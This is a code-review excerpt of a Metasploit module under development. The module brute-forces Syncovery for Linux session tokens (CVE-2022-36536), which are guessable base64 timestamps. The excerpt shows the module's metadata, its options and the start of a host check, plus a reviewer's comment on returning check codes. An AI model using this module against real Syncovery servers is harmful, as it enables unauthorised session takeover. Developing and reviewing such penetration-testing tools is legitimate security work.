modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb

```diff
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'base64'
+require 'date'
+require 'json'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Syncovery For Linux Web-GUI Session Token Brute-Forcer',
+        'Description' => %q{
+          This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
+          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
+          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
+          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time
+          of the login instead of a random token.
+          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.
+        },
+        'Author' => [ 'Jan Rude' ],
+        'References' => [
+          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
+          ['CVE', '2022-36536']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'DisclosureDate' => '2022-09-06',
+        'DefaultOptions' => {
+          'RPORT' => 8999,
+          'STOP_ON_SUCCESS' => true # One valid session is enough
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
+        OptInt.new('DAYS', [true, 'Check today and last X day(s) for valid session token', 1]),
+        OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
+      ]
+    )
+
+    deregister_options(
+      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',
+      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
+      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'PASSWORD_SPRAY', 'BLANK_PASSWORDS',
+      'USER_FILE', 'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to host - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res.code})") if res.code != 200
```

Comment:
`check_host ` is called by the `check` command and must return a `Exploit::CheckCode::*`. It is not possible to use `fail_with` here. Please see the [documentation](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes) for details about the available CheckCodes and their description.

I believe `Exploit::CheckCode::Unknown` could be used for both cases:
```suggestion
    return CheckCode::Unknown("#{peer} - Could not connect to host - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Error (response code: #{res.code})") if res.code != 200
```